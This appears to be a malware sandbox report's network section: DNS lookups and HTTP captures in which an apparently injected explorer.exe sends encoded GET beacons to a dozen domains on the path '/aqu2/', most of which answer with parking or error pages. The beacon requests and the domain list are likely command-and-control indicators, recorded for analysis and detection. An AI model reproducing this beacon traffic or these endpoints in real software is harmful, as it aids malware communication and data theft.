                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:10.807682037 CEST8.8.8.8192.168.2.40x5a5cNo error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:16.193547010 CEST8.8.8.8192.168.2.40xb5c9No error (0)www.heliumhubs.comheliumhubs.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:16.193547010 CEST8.8.8.8192.168.2.40xb5c9No error (0)heliumhubs.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:21.378154039 CEST8.8.8.8192.168.2.40x793fNo error (0)www.420vaca.com64.190.62.111A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.641731024 CEST8.8.8.8192.168.2.40x7985No error (0)www.shujahumayun.comwww135.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.641731024 CEST8.8.8.8192.168.2.40x7985No error (0)www135.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.641731024 CEST8.8.8.8192.168.2.40x7985No error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.641731024 CEST8.8.8.8192.168.2.40x7985No error (0)5f36b111-balancer.wixdns.nettd-balancer-dc11-60-177.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:26.641731024 CEST8.8.8.8192.168.2.40x7985No error (0)td-balancer-dc11-60-177.wixdns.net185.230.60.177A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:32.013699055 CEST8.8.8.8192.168.2.40x2066No error (0)www.dottproject.com91.195.240.94A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:37.457993031 CEST8.8.8.8192.168.2.40xd1ccNo error (0)www.qcmax.com104.128.125.95A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:43.182207108 CEST8.8.8.8192.168.2.40xb0a5No error (0)www.playfulpainters.complayfulpainters.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:49:43.182207108 CEST8.8.8.8192.168.2.40xb0a5No error (0)playfulpainters.com34.102.136.180A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:48.366859913 CEST8.8.8.8192.168.2.40x3e76No error (0)www.autobrehna.com62.116.130.8A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:53.884182930 CEST8.8.8.8192.168.2.40x150fName error (3)www.nagoyadoori.xyznonenoneA (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:49:59.359829903 CEST8.8.8.8192.168.2.40xbcdaNo error (0)www.appgusher.com156.254.221.72A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)www.thesixteenthround.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                        Apr 8, 2021 10:50:05.634023905 CEST8.8.8.8192.168.2.40x6686No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.biehnrecords.com
                                                                        • www.bedpee.com
                                                                        • www.pmrack.com
                                                                        • www.serversexposed.com
                                                                        • www.heliumhubs.com
                                                                        • www.420vaca.com
                                                                        • www.shujahumayun.com
                                                                        • www.dottproject.com
                                                                        • www.qcmax.com
                                                                        • www.playfulpainters.com
                                                                        • www.autobrehna.com
                                                                        • www.appgusher.com
                                                                        • www.thesixteenthround.net

                                                                        HTTP Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        0192.168.2.449734184.168.131.24180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:48:49.778557062 CEST1389OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=Nog7saUMDwoWD2E1asrlCYsF2JarF3pmjxpXcoGpoLe9R6S6cRBIZYNmkdpvudxvP9hF HTTP/1.1
                                                                        Host: www.biehnrecords.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:48:49.956664085 CEST1389INHTTP/1.1 502 Bad Gateway
                                                                        Server: nginx/1.16.1
                                                                        Date: Thu, 08 Apr 2021 08:48:49 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 157
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        1192.168.2.44973713.248.216.4080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:48:55.129555941 CEST1438OUTGET /aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.bedpee.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:48:55.307358027 CEST1438INHTTP/1.1 403 Forbidden
                                                                        Server: awselb/2.0
                                                                        Date: Thu, 08 Apr 2021 08:48:55 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 118
                                                                        Connection: close
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        10192.168.2.44977062.116.130.880C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:48.392472029 CEST6753OUTGET /aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.autobrehna.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:48.428760052 CEST6754INHTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 08:49:48 GMT
                                                                        Server: Apache
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        X-Varnish: 494633303
                                                                        Age: 0
                                                                        X-redirector: MTk4MzEyMjYK
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 160
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 70 72 6f 64 75 6b 74 65 2e 77 65 62 2e 64 65 2f 68 6f 6d 65 70 61 67 65 2d 75 6e 64 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://produkte.web.de/homepage-und-mail/homepage-parken/"></frameset></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        11192.168.2.449773156.254.221.7280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:50:00.378705978 CEST6782OUTGET /aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.appgusher.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:50:00.575277090 CEST6783INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 08:50:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 1.0


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        12192.168.2.449777198.54.117.21580C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:50:05.817534924 CEST6822OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7 HTTP/1.1
                                                                        Host: www.thesixteenthround.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        2192.168.2.449742135.181.58.2780C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:05.675004959 CEST5711OUTGET /aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.pmrack.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:05.732119083 CEST5711INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 08:49:05 GMT
                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                        Content-Length: 276
                                                                        Connection: close
                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 70 6d 72 61 63 6b 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.pmrack.com Port 80</address></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        3192.168.2.44974364.32.22.10280C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:10.974932909 CEST5712OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe HTTP/1.1
                                                                        Host: www.serversexposed.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:11.139461040 CEST5713INHTTP/1.1 302 Moved Temporarily
                                                                        Server: nginx
                                                                        Date: Thu, 08 Apr 2021 08:49:11 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 154
                                                                        Connection: close
                                                                        Location: http://www.serversexposed.com?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=BTUR3n/6oIRf9T7Z05GVe/Yy9bfPjZd+/OGeJHu++OIAwxof8xfoUtHRcnIR2ViXQlpe
                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                        Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        4192.168.2.44975534.102.136.18080C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:16.207128048 CEST6552OUTGET /aqu2/?mbyD=I0+E1VrnC0QGGj/3MDw3ZvYPYqqz6w+SLlQhXTSeWc0xAJh7y/Tkq/xacGspuDOT4pat&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.heliumhubs.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:16.320554018 CEST6564INHTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Thu, 08 Apr 2021 08:49:16 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "606abe3b-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        5192.168.2.44975864.190.62.11180C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:21.406011105 CEST6616OUTGET /aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4 HTTP/1.1
                                                                        Host: www.420vaca.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:21.577060938 CEST6618INHTTP/1.1 200 OK
                                                                        date: Thu, 08 Apr 2021 08:49:21 GMT
                                                                        content-type: text/html; charset=UTF-8
                                                                        transfer-encoding: chunked
                                                                        vary: Accept-Encoding
                                                                        expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                        cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        pragma: no-cache
                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg==
                                                                        last-modified: Thu, 08 Apr 2021 08:49:21 GMT
                                                                        x-cache-miss-from: parking-6dfcfcdcd9-bqj82
                                                                        server: NginX
                                                                        connection: close
                                                                        Data Raw: 32 44 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 66 74 65 43 75 4e 37 7a 69 66 6a 77 37 59 6d 71 44 48 79 61 30 44 51 6b 74 4a 75 7a 72 33 2b 36 53 47 78 54 34 6f 33 4c 36 43 53 77 2f 48 2f 58 47 6b 76 67 6a 68 52 48 73 43 72 74 75 55 43 2b 30 4f 62 76 6d 42 46 38 2f 49 62 2b 67 77 67 70 73 46 76 59 6c 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 32 30 76 61 63 61 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 7a 75 6d 20 54 68 65 6d 61 20 77 65 65 64 20 66 72 69 65 6e 64 6c 79 20 74 72 61 76 65 6c 20 34 32 30 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 44 69 65 73 65 20 57 65 62 73 69 74 65 20 73 74 65 68 74 20 7a 75 6d 20 56 65 72 6b 61 75 66 21 20 34 32 30 76 61 63 61 2e 63 6f 6d 20 69 73 74 20 64 69 65 20 62 65 73 74 65 20 51 75 65 6c 6c 65 20 66 c3 bc 72 20 61 6c 6c 65 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 65 6e 20 64 69 65 20 53 69 65 20 73 75 63 68 65 6e 2e 20 56 6f 6e 20 61 6c 6c 67 65 6d 65 69 6e 65 6e 20 54 68 65 6d 65 6e
                                                                        Data Ascii: 2DE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_fteCuN7zifjw7YmqDHya0DQktJuzr3+6SGxT4o3L6CSw/H/XGkvgjhRHsCrtuUC+0ObvmBF8/Ib+gwgpsFvYlg==><head><meta charset="utf-8"><title>420vaca.com&nbsp;-&nbspDiese Website steht zum Verkauf!&nbsp;-&nbspInformationen zum Thema weed friendly travel 420.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Diese Website steht zum Verkauf! 420vaca.com ist die beste Quelle fr alle Informationen die Sie suchen. Von allgemeinen Themen


                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                        6192.168.2.449759185.230.60.17780C:\Windows\explorer.exe
                                                                        TimestampkBytes transferredDirectionData
                                                                        Apr 8, 2021 10:49:26.760282993 CEST6636OUTGET /aqu2/?mbyD=KqXpoBRkSkhIKFWf0/hcWEBIf2LJNQsM+D3z3wmjuC1NFHENbZKDXJc64HLZauRofodl&EhUtvx=xdFt3xAHnXiTPL3p HTTP/1.1
                                                                        Host: www.shujahumayun.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 10:49:26.951628923 CEST6638INHTTP/1.1 404 Not Found
                                                                        Date: Thu, 08 Apr 2021 08:49:26 GMT
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        x-wix-request-id: 1617871766.8235547367513413022
                                                                        vary: Accept-Encoding
                                                                        Age: 0
                                                                        X-Seen-By: 6ivkWfREES4Y8b2pOpzk7Owfbs+7qUVAqsIx00yI78k=,sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkVivd4o9HMoDTVPhK7/s60Jl,m0j2EEknGIVUW/liY8BLLhe/Ft074qYAt5jyfc2Z/bHV0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRaljV3HpR8xZqSNZ1HRmu/MT7fb/McGpTYWlzKPcjCkEy/J+IxyhklpGfG6pTJrtUSeA==,2UNV7KOq4oGjA5+PKsX47Ay/vVeTGg75VNBOw8znOgAfbJaKSXYQ/lskq2jK6SGP,8Jozq2XDr5/0Pv3E0yMnd9NvNe0e540rcGIosj5ItuEaWyug/ZdHQ36uOAkr89T0,SN48OXVfD7mFj9SdiKQMqTAOhpQfuQfXExzNxffpiV1/AD/ma+Nc5exnexQxgiaz
                                                                        Server: Pepyaka/1.15.10
                                                                        Data Raw: 62 39 33 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 77 69 78 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63
                                                                        Data Ascii: b93 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.parastorage.c


